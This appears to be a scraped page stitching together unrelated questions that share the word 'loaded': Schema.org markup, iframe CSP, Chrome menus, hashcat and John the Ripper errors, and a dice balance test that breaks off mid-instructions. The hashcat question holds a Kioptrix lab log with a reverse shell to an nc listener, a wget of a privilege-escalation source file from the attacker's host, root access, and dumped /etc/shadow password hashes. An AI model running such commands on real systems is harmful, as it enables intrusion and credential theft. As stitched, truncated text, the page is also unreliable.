How can I use Schema.org structured data for dynamically loaded images?

I have a webpage with a lot of images that I load dynamically onto the page dynamically using Javascript/JSON data.

The images’ rendered output is:

<li itemscope itemtype="http://schema.org/ImageObject">  <img src="$  {data.file}" alt="$  {data.alt}" itemprop='contentURL'> <div class="imageInfo">  <h2 itemprop="name">$  {data.name}</h2>  </div>  </li> 

The schema structured data values I get from the JSON file are data.file for the itemprop="contentURL" and data.name for the itemprop="name".

I have read that Google doesn’t use dynamically loaded schema markup unless you use JSON-LD. Currently when I test with Google’s structured data testing tool I see that the test shows there’s no structured data for my dynamically loaded content.

What are the steps I need to take to make sure that Google uses/sees my dynamically loaded structured data?

Security Benefits of Having a Content Security Policy for a Domain Loaded through iframe

Consider the below scenario:

There’s a checkout webpage that can be accessed at checkout.example.com. This page has decent security policy. But just to prevent any credit card info leakage, credit card information editing panel is in an iframe and this panel can be loaded from cc.example.com.

Now, are there any security benefits for having a good Content Security Policy for cc.example.com when we are loading it in an iframe in checkout.example.com?

“View frame source” is suddenly an option on every website loaded with Chrome

I’m running Google Chrome Version 83.0.4103.61 (64-bit) on Windows 10, and I’ve suddenly noticed that never mind what website I visit, when I right click “View frame source” is an option.

This strikes me as odd, as that option is usually only available when you’re wanting to view the source code of an iFrame. Whether I click “View frame source” or “View page source” the source code and URL are the same.

But why does Chrome suddenly think that any website I load is being displayed in a frame? Is this cause for concern or am I just being paranoid?

hashcat: No hashes loaded

I’ve been trying Kioptrix: Level 1.1 (#2) and managed to get root access. https://www.vulnhub.com/entry/kioptrix-level-11-2,23/

wolf@linux:~$   nc -vklp 8080 listening on [any] 8080 ... 10.10.10.10: inverse host lookup failed: Unknown host connect to [10.10.10.99] from (UNKNOWN) [10.10.10.10] 32795  id uid=48(apache) gid=48(apache) groups=48(apache)  cd /tmp wget http://10.10.10.99/privesc.c ls privesc.c gcc privesc.c -o privesc ./privesc  id uid=0(root) gid=0(root) groups=48(apache)  cat /etc/passwd cat /etc/shadow 

unshadow file = md5.txt

wolf@linux:~$   cat md5.txt  root:$  1$  FTpMLT88$  VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash john:$  1$  wk7kHI5I$  2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash harold:$  1$  7d.sVxgm$  3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash wolf@linux:~$    

However, I’m having a problem sending the unshadow file md5.txt to hashcat.

Any idea what’s wrong with this?

wolf@linux:~$   hashcat -m 0 -a 0 md5.txt rockyou.txt hashcat (v4.0.1) starting...  * Device #1: WARNING! Kernel exec timeout is not disabled.              This may cause "CL_OUT_OF_RESOURCES" or related errors.              To disable the timeout, see: https://hashcat.net/q/timeoutpatch nvmlDeviceGetFanSpeed(): Not Supported  OpenCL Platform #1: NVIDIA Corporation ======================================  Hashfile 'md5.txt' on line 1 (root:$  1$  FTpMLT88$  VdzDQTTcksukSKMLRSVlc.:0:0:root:/root:/bin/bash): Line-length exception Hashfile 'md5.txt' on line 2 (john:$  1$  wk7kHI5I$  2kNTw6ncQQCecJ.5b8xTL1:500:500::/home/john:/bin/bash): Line-length exception Hashfile 'md5.txt' on line 3 (harold:$  1$  7d.sVxgm$  3MYWsHDv0F/LP.mjL9lp/1:501:501::/home/harold:/bin/bash): Line-length exception Parsing Hashes: 0/3 (0.00%)...No hashes loaded.  Started: Mon May 25 01:17:21 2020 Stopped: Mon May 25 01:17:21 2020 wolf@linux:~$    

Chrome: why is invalid certificate usage for resources loaded from localhost disabled?

In chrome there is a flag called: allow-insecure-localhost. As far as I can tell all it does is block localhost connection over tls if the certificate is self signed.

Why is this feature turned off by default? Does it affect regular users in any way (regular user = someone who is not developing something). Are there any serious cases of localhost connection being used malicious that could have been prevented by having this option enabled?

JohnTheRipper Error: No password hashes loaded (see FAQ)

I’m new to CTF challenges and came across a challenge where I’m required to crack the ZIP file using johntheripper with the rockyou.txt wordlist.

So for that, I tried both using sudo apt-get install john

And also using the GitHub repo of it and compiling it. But in both cases, I’m getting the same error

Using default input encoding: UTF-8

No password hashes loaded (see FAQ)

I’m using Ubuntu on my Windows 10 machine using Windows Subsystem for Linux.

So please help me out with the steps I need to follow to rectify the issue.

Is the Saltwater Float represented in this question a good way to test for loaded dice?

Recently a question has popped up in the comments of another question I’ve recently answered where a player has happened to roll three 18s and other high stats at a table with his dice, which could lead me to believe that he may be playing with a set of loaded or imbalanced dice.

Is the method presented in the youtube video How to check the balance of your d20 an accurate representation of a die’s weighting and balance and could it be used to properly and reliably test whether dice are loaded?

The video provides the following instructions for testing whether or not a die is balanced or not:

Ingredients:
1/4 cup of hot tap water (our water is a little hard)
6 tablespoons of Epsom salt

  1. Put the water in a small jam jar.
  2. Dump 2 tablespoons of Epsom salt into the water; put the lid on it and shake it till it dissolves.
  3. Dump 2 more tablespoons of Epsom salt into the water; put the lid on it and shake it till it dissolves.
  4. Add the last 2 tablespoons of Epsom salt; microwave the water on high for 30 seconds.
  5. Put the lid on it and shake it till it dissolves (use a dish towel to hold this, it is hot at this point).
  6. Once dissolved, set the closed container in a cold water bath until it cools back down to a little cooler than the room temperature.